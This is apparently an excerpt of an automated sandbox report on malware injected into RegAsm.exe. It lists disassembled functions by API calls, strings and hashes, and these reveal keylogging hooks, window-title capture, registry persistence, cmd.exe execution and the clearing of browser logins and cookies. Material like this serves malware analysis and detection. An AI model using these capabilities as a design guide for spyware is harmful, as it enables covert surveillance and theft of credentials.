                                                                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                                                                          • String ID: Connection Timeout
                                                                                                                          • API String ID: 2055531096-499159329
                                                                                                                          • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                          • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                          • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                          • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                          APIs
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throw
                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                                          • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValue
                                                                                                                          • String ID: pth_unenc
                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                          APIs
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                          • String ID: bad locale name
                                                                                                                          • API String ID: 3628047217-1405518554
                                                                                                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHandleLibraryModule
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 662261464-1276376045
                                                                                                                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: 02x
                                                                                                                          • API String ID: 3677997916-1753518589
                                                                                                                          • Opcode ID: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                                                          • Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                                                                                          • Opcode Fuzzy Hash: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                                                          • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                          • String ID: !D@
                                                                                                                          • API String ID: 186401046-604454484
                                                                                                                          • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                          • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                                          • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                          • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                          APIs
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteShell
                                                                                                                          • String ID: /C $cmd.exe$open
                                                                                                                          • API String ID: 587946157-3896048727
                                                                                                                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                          • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread$HookUnhookWindows
                                                                                                                          • String ID: pth_unenc
                                                                                                                          • API String ID: 3123878439-4028850238
                                                                                                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: GetCursorInfo$User32.dll
                                                                                                                          • API String ID: 1646373207-2714051624
                                                                                                                          • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                          • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                          • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                          • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetLastInputInfo$User32.dll
                                                                                                                          • API String ID: 2574300362-1519888992
                                                                                                                          • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                          • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                          • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                          • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1036877536-0
                                                                                                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                          • __freea.LIBCMT ref: 100087D5
                                                                                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2652629310-0
                                                                                                                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                          • API String ID: 3472027048-1236744412
                                                                                                                          • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                          • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                                                          • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                          • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                                          APIs
                                                                                                                          • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                                                          • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DisplayEnum$Devices$Monitors
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1432082543-0
                                                                                                                          • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                          • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                                                          • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                          • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                                                          APIs
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandleReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3642004256-0
                                                                                                                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$SleepText$ForegroundLength
                                                                                                                          • String ID: [ $ ]
                                                                                                                          • API String ID: 3309952895-93608704
                                                                                                                          • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                          • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 188215759-0
                                                                                                                          • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                          • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                                                          • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                          • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
